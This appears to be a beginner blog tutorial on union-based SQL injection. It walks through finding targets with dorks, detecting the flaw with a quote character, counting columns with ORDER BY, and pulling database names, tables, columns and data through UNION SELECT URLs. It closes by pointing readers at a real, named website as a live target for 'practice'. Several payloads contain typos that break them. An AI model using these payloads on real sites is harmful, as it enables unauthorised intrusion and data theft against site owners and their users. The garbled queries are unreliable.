Hi friends today I will show you sqli injection tutorial step by step for beginners only
Let
us take an example: http:
//www.site.com/index.php?id=1
There
are many dorks available to find sqli vulnerable sites better you make your own
dork.
Now
we have to check that this site is vulnerable to sqli or not for that simply
add an asterisk (‘) at the end of the link
Example:
http: //www.site.com/index.php?id=1’
If
u got this error below then this site is vulnerable to sqli
You
have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line
1
Now
the real thing start
Now
we have to find the number of columns
Follow
below steps
http://www.site.com/index.php?id=1 order by 1 --+ (no
error)
http://www.site.com/index.php?id=1 order by 2 --+ (no
error)
http://www.site.com/index.php?id=1 order by 3 --+ (no
error)
http://www.site.com/index.php?id=1 order by 4 --+ (no
error)
http://www.site.com/index.php?id=1 order by 5 --+ (error
i.e Unknown column '5' in 'order clause’)
That
means there are 4 columns
Now
we have to find the vulnerable column
To
find the vulnerable column where we have to inject
Follow
the procedure
Now
check there is a some number 1, 2, 3 or 4 is displaying on the webpage like the
below picture
Obtaining
database version: it is very easy on simple sqli site just replace the
vulnerable columns.
Here
2 and 3 are vulnerable and u can choose any one column to inject.
Here
I am selecting 3 and
Check
the example how you can obtain the database version
Here use can also use “@@version” in place of “version() “
And obtaing database name and user same as version just
replace version() ith database() for database and replace version() with user()
for batabase user
Now we have to retrive the database
We have to find the table name from database
For table names we have to write the query like below
example
Example: http://www.site.com/index.php?id=-1 union all
select 1,2,table_name,4 from
information_schema.tables where table_schema=database() --+
Or you can replace database() with db name with single
qoute ex: ‘mydatabase’
Now we have to find the columns name of tables
available in database
Example: http://www.site.com/index.php?id=-1 union all
select 1,2,column_name,4 from
information_schema.columnss where table_name=’xyz’ --+
You have to replace the xyz with the table name you
want to retrive column name
Now last step if u want to retrive data from a table
write the query like this
1,2,concat(0x3a,colum nname,0x3a,colum nname),4
from tablename --+
Here replace column name and table name according to your database
Here is a vulnerable site link for practice don’t miss
use it
Vulnerable link: http://www.naturesplus.com/sourceoflife/products/productDetail.php?id=30595hope you like the post
give your valuable comments